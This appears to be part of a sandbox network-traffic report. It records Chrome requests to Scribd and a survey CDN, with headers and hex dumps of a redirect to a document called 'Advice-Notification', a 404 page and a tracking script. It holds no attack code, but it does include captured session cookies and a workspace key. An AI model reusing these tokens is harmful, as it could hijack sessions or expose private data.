                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "1eff6efeac587cff43f6dd5a15851140"
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 19:36:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-id-2: y7J9CKIkzkMzuLV0cy4co+Y0fT09ANxoPYvEH7UaiOSq1USqJM7nBDUzISyg2lEYgcR4KbZKRiQ=
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-request-id: HEA2G9MB7W6N0XPT
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-version-id: TEWuJY3STFXSLjZSVy7O_P5dI_Suu3fK
                                                                                                                                                                                                                                                                                                                                                                                        CDN-ProxyVer: 1.06
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestPullSuccess: True
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestPullCode: 200
                                                                                                                                                                                                                                                                                                                                                                                        CDN-CachedAt: 12/03/2024 19:53:11
                                                                                                                                                                                                                                                                                                                                                                                        CDN-EdgeStorageId: 892
                                                                                                                                                                                                                                                                                                                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        report-to: { "group": "csp-endpoint-survey", "max_age": 10886400, "endpoints": [{ "url": "https://panel-api.survicate.com/_/report_csp/survey" }] }
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'self' 'unsafe-inline' https://surveys-static.survicate.com https://surveys-static-prd.survicate-cdn.com; connect-src https://respondent.survicate.com 'self'; img-src https://*; font-src https://surveys-static.survicate.com https://surveys-static-prd.survicate-cdn.com https://use.typekit.net https://fonts.gstatic.com; report-to csp-endpoint-survey;
                                                                                                                                                                                                                                                                                                                                                                                        CDN-Status: 200
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestTime: 0
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestId: 3401ded91518c88d163cd9cf5ac86aa9
                                                                                                                                                                                                                                                                                                                                                                                        CDN-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC220INData Raw: 76 61 72 20 5f 73 54 72 61 63 6b 69 6e 67 41 6c 72 65 61 64 79 50 72 65 73 65 6e 74 3d 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 73 76 64 21 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 26 26 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 73 76 63 21 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 3b 76 61 72 20 5f 73 76 63 3d 77 69 6e 64 6f 77 2e 5f 73 76 63 7c 7c 7b 7d 3b 76 61 72 20 5f 73 76 64 3d 77 69 6e 64 6f 77 2e 5f 73 76 64 7c 7c 7b 7d 3b 5f 73 76 63 2e 77 6f 72 6b 73 70 61 63 65 4b 65 79 3d 5f 73 76 63 2e 77 6f 72 6b 73 70 61 63 65 4b 65 79 7c 7c 27 37 64 65 38 37 62 63 37 33 61 66 66 31 39 37 34 39 34 35 30 35 39 65 32 33 30 66 62 39 35 33 64 27 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: var _sTrackingAlreadyPresent=(typeof window._svd!=='undefined'&&typeof window._svc!=='undefined');var _svc=window._svc||{};var _svd=window._svd||{};_svc.workspaceKey=_svc.workspaceKey||'7de87bc73aff1974945059e230fb953d';


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        49192.168.2.1649772151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC2453OUTGET /documents/801519291/pingback HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1345INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private, no-store
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                                        Location: https://www.scribd.com/document/801519291/Advice-Notification
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; domain=.scribd.com; path=/; expires=Mon, 06 Dec 2027 21:59:29 GMT; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                        Status: 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 16
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: 63dc843a4354163d4560f8a990353a85572d03713095096b68ed2bf5ceb68ace
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.010998
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC318INData Raw: 58 2d 53 65 72 76 65 64 2d 42 79 3a 20 63 61 63 68 65 2d 65 77 72 2d 6b 65 77 72 31 37 34 30 30 33 38 2d 45 57 52 0d 0a 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 0d 0a 58 2d 43 61 63 68 65 2d 48 69 74 73 3a 20 30 0d 0a 58 2d 54 69 6d 65 72 3a 20 53 31 37 33 33 35 32 32 33 37 30 2e 35 39 30 37 30 32 2c 56 53 30 2c 56 45 34 33 0d 0a 56 61 72 79 3a 20 58 2d 4c 61 6e 67 75 61 67 65 2d 4c 6f 63 61 6c 65 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 33 30 37 32 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: X-Served-By: cache-ewr-kewr1740038-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1733522370.590702,VS0,VE43Vary: X-Language-Locale,Accept-EncodingStrict-Transport-Security: max-age=63072000; includeSubDomainsalt-svc: h3=":443";ma=86400,h3-29=":443"
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC4INData Raw: 37 66 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 7f
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC127INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 63 72 69 62 64 2e 63 6f 6d 2f 64 6f 63 75 6d 65 6e 74 2f 38 30 31 35 31 39 32 39 31 2f 41 64 76 69 63 65 2d 4e 6f 74 69 66 69 63 61 74 69 6f 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><body>You are being <a href="https://www.scribd.com/document/801519291/Advice-Notification">redirected</a>.</body></html>
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        50192.168.2.1649773151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC2449OUTGET /doc-page/personalization HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1365INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private, no-store
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: _scribd_session=Mm9lTytWZW0rVk0vUkxQbWNiWGdkMFJhd3JVTFJVVlBGbGo3aEt3TEZNZmJqUVNDQ2pITzMrU3J5SWVNL0NaK241TTlpdGJmSWtWajBjOWxiYmRSY3BCYW9BVVppejEybU9xU1haK2ZNTUVlUEJsYTd2N3pEZHRhbDhOaDYzQVFqM1FKSzI5eG5WOStZMlhYVlB4bVpGZjBMUFIxVnlLZldLWTlwYmk0cmdkSm4rbFAxUU1ERzNtTXFXYVR3YlpxRTdoSEtzK2E4ak1wcHVqa3B2RjhteTdMUWJoSis1cGRlL0lrSEd0NmFnNVBuZjlKMzhWRmltRnNVQ0pYSjl4Y0w3MlhQenk2eDNYdVJOaHAzb2phU1Q3eCtORFc1ZmxzWTRqRzRvSVNTNW9OMjIzdHlSM0lUMVM4enRieDQxQ3gtLWc4WTZrZ2l5bWwyRmFrdGtyK1NDWUE9PQ%3D%3D--c830bea85a1d9383c20d057010114f968bca60c6; domain=.scribd.com; path=/; expires=Mon, 06 Dec 2027 21:59:29 GMT; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                        Status: 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 6
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: 49aea277f5340b14efe6ae1b3d1308806fdf1da300596220e2048dd0a6500869
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.004781
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740067-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522370.591986,VS0,VE36
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC208INData Raw: 56 61 72 79 3a 20 58 2d 4c 61 6e 67 75 61 67 65 2d 4c 6f 63 61 6c 65 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 33 30 37 32 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Vary: X-Language-Locale,Accept-EncodingStrict-Transport-Security: max-age=63072000; includeSubDomainsalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC6INData Raw: 34 30 30 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 4000
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 53 63 72 69 62 64 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 2f 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 2f 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html><head><title>Page not found | Scribd</title><meta content="width=device-width,initial-scale=1,minimum-scale=1" name="viewport"/><meta content="text/html; charset=utf-8" http-equiv="Content-type"/><meta content="origin" name="referrer"
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 2d 73 61 6e 64 2d 31 30 30 3a 20 23 66 62 66 39 66 38 3b 2d 2d 63 6f 6c 6f 72 2d 67 72 65 65 6e 2d 33 30 30 3a 20 23 32 35 35 62 32 35 3b 2d 2d 63 6f 6c 6f 72 2d 67 72 65 65 6e 2d 32 30 30 3a 20 23 33 63 37 36 33 64 3b 2d 2d 63 6f 6c 6f 72 2d 67 72 65 65 6e 2d 31 30 30 3a 20 23 64 66 66 30 64 38 3b 2d 2d 63 6f 6c 6f 72 2d 79 65 6c 6c 6f 77 2d 33 30 30 3a 20 23 61 66 37 62 32 64 3b 2d 2d 63 6f 6c 6f 72 2d 79 65 6c 6c 6f 77 2d 32 30 30 3a 20 23 66 37 63 37 37 65 3b 2d 2d 63 6f 6c 6f 72 2d 79 65 6c 6c 6f 77 2d 31 30 30 3a 20 23 66 63 66 31 64 39 3b 2d 2d 63 6f 6c 6f 72 2d 72 65 64 2d 33 30 30 3a 20 23 38 66 31 31 32 30 3b 2d 2d 63 6f 6c 6f 72 2d 72 65 64 2d 32 30 30 3a 20 23 61 61 31 35 32 37 3b 2d 2d 63 6f 6c 6f 72 2d 72 65 64 2d 31 30 30 3a 20 23 66 32 64
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -sand-100: #fbf9f8;--color-green-300: #255b25;--color-green-200: #3c763d;--color-green-100: #dff0d8;--color-yellow-300: #af7b2d;--color-yellow-200: #f7c77e;--color-yellow-100: #fcf1d9;--color-red-300: #8f1120;--color-red-200: #aa1527;--color-red-100: #f2d
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 2d 31 30 30 3a 20 23 35 63 35 63 35 63 3b 2d 2d 63 6f 6c 6f 72 2d 73 69 6c 76 65 72 2d 35 30 30 3a 20 23 38 63 38 63 38 63 3b 2d 2d 63 6f 6c 6f 72 2d 73 69 6c 76 65 72 2d 34 30 30 3a 20 23 61 64 61 64 61 64 3b 2d 2d 63 6f 6c 6f 72 2d 73 69 6c 76 65 72 2d 33 30 30 3a 20 23 63 32 63 32 63 32 3b 2d 2d 63 6f 6c 6f 72 2d 73 69 6c 76 65 72 2d 32 30 30 3a 20 23 64 36 64 36 64 36 3b 2d 2d 63 6f 6c 6f 72 2d 73 69 6c 76 65 72 2d 31 30 30 3a 20 23 65 62 65 62 65 62 3b 2d 2d 63 6f 6c 6f 72 2d 6d 69 64 6e 69 67 68 74 2d 75 6c 74 72 61 2d 34 30 30 3a 20 23 30 34 39 38 65 37 3b 2d 2d 63 6f 6c 6f 72 2d 6d 69 64 6e 69 67 68 74 2d 75 6c 74 72 61 2d 33 30 30 3a 20 23 30 30 61 34 66 62 3b 2d 2d 63 6f 6c 6f 72 2d 6d 69 64 6e 69 67 68 74 2d 75 6c 74 72 61 2d 32 30 30 3a 20 23
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -100: #5c5c5c;--color-silver-500: #8c8c8c;--color-silver-400: #adadad;--color-silver-300: #c2c2c2;--color-silver-200: #d6d6d6;--color-silver-100: #ebebeb;--color-midnight-ultra-400: #0498e7;--color-midnight-ultra-300: #00a4fb;--color-midnight-ultra-200: #
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 2d 2d 61 63 63 65 6e 74 2d 63 6f 6c 6f 72 2d 66 61 6c 6c 62 61 63 6b 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 6e 6f 77 2d 33 30 30 29 3b 7d 62 6f 64 79 2c 68 74 6d 6c 20 7b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 2e 77 72 61 70 70 65 72 5f 5f 65 72 72 6f 72 5f 6c 61 79 6f 75 74 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 77 68 69 74 65 2d 31 30 30 29 3b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 6c 61 74 65 2d 37 30 30 29 3b 70 61 64 64 69 6e 67 3a 20 30 3b 6d 61 72 67 69 6e 3a 20 30 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 7d 2e 77 72 61 70 70 65 72 5f 5f 65 72 72 6f 72 5f 6c 61 79 6f 75 74 20 2e 63 6f 6e 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: --accent-color-fallback: var(--color-snow-300);}body,html {height: 100%;}.wrapper__error_layout {background-color: var(--color-white-100);color: var(--color-slate-700);padding: 0;margin: 0;display: flex;flex-direction: column;}.wrapper__error_layout .cont
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 20 30 20 35 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 35 70 78 3b 7d 2e 77 72 61 70 70 65 72 5f 5f 65 72 72 6f 72 5f 6c 61 79 6f 75 74 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 69 6e 6b 73 20 6c 69 3a 3a 62 65 66 6f 72 65 20 7b 63 6f 6e 74 65 6e 74 3a 20 22 2d 22 3b 7d 2e 77 72 61 70 70 65 72 5f 5f 65 72 72 6f 72 5f 6c 61 79 6f 75 74 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 69 6e 6b 73 20 6c 69 3a 66 69 72 73 74 2d 63 68 69 6c 64 3a 3a 62 65 66 6f 72 65 20 7b 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 7d 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 35 31 32 70 78 29 20 7b 2e 77 72 61 70 70 65 72 5f 5f 65 72 72 6f 72 5f 6c 61 79 6f 75 74 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 69 6e 6b 73 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0 5px;margin: 0 5px;}.wrapper__error_layout .content .links li::before {content: "-";}.wrapper__error_layout .content .links li:first-child::before {content: "";}@media(max-width:512px) {.wrapper__error_layout .content .links {display: block;position: re
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 3a 2f 2f 73 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 2f 6c 69 67 68 74 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 5f 33 30 30 2e 33 61 38 31 37 36 64 62 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 2f 6c 69 67 68 74 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 5f 33 30 30 2e 32 38 36 63 37 32 37 39 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 75 72 6c 28 68 74 74 70 73 3a
